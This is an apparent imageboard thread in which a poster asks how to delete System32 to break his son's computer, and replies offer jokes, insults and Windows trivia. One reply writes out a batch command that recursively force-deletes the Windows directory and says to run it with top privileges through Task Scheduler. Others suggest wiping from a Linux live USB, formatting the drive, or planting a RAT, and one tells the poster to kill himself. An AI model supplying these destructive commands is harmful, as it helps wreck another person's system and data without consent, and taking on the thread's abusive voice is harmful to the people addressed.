Based boomer here...

Based boomer here. I tried deleting system32 folder on my son’s desktop to try and brick it but even when I provided administrator access and skipped whatever trustedinstaller wouldn’t let me delete it still didn’t seem like it deleted much of anything and the process ended in a couple seconds. How do I delete system32?

Attached: 20B9061A-C118-4761-8C31-42500C938821.jpeg (381x381, 106.93K)

Other urls found in this thread:

get-itsolutions.com/create-scheduled-task-windows-task-scheduler/
twitter.com/SFWRedditVideos

Dude just put a RAT on it for better pranks and flirt with young girls on his behalf.

In the old days there was a bat script to do this. Maybe try googling for that?

invite your son onto IRC and then flood him off of it.

I didn't realize that there was still a system32 folder in the age of Windows 64 bit edition.

It's windows, you think they'd actually bother updating shit?

that you can delete system32 and break a system is a feature, damnit.
every version of windows gets worse

I deleted System32 on my Commadore 64 once. Good shit, Maynard!
*sips*

It's called backwards compatibility, dumbass. Microshit might have many problems, but backwards compatibility is not one of them. They take enormous pains to keep things working version to version. It's one of the reason their APIs are horrendous and convoluted, due to all the stone-age cruft they still support.

paste this on notepad, save it as lol.bat
del "%WINDIR%\*.*" /s /f /q

use task scheduler to run it with highest admin privileges
get-itsolutions.com/create-scheduled-task-windows-task-scheduler/

Attached: 1543110216.jpg (669x691, 57.7K)

Just download as much bloatware as possible and hide it well. or just flash an ISO of a linux distribution and wipe that sucker.

repairing after removing system32 wasnt even that hard if i remember correctly. Just format his whole entire drive for a real prank

I think you need to del it from a cmd

Kinda doubt you're a literal boomer. Actual boomers are 60ish/70ish now. 40ish/50ish people are GenX-ers.
Also can't stand how people call things from the (early) 90s like Amiga or Slackware "boomer things". Actual boomers where already 40ish in the 90s and most of them weren't up to date with technology at all anymore. It was the 20ish/30ish GenX-ers and the teenage GenY-ers who were the 90s biggest tech enthusiasts, not fucking boomers who were their parents.

You can use a Linux LiveUSB to bypass all Windows's restrictions on a NTFS partition.
Don't forget to kill yourself afterwards because boomers are a fucking cancer to this planet.

You do realise that most executables were 32-bit during the time since 64-bit Windows was released, and that a pure 64-bit Windows would have been next to useless to 99.9% of users?
Also, you do realise that there's a "system" directory with 16-bit shit in it on a 32-bit Windows?

It's actually kinda funny, 64 bit versions of Windows store the 64-bit binaries and dlls in system32, where does it store the 32-bit ones?, it has a special folder for them that is only present in 64-bit versions of windows and the folder is called SysWOW64.

64-bit binaries and dlls go in system32
32-bit binaries and dlls go in SysWOW64.

How about triforce then?

The biggest thing I noticed when I stopped using Windows is how much easier it is to program. Even for bash files. Window's architecture is fucked up from the top down.

Attached: 1542385714239.jpg (470x353, 38.17K)

Mount the partition in a linux distrobution and delet the folder with root, works every tiem.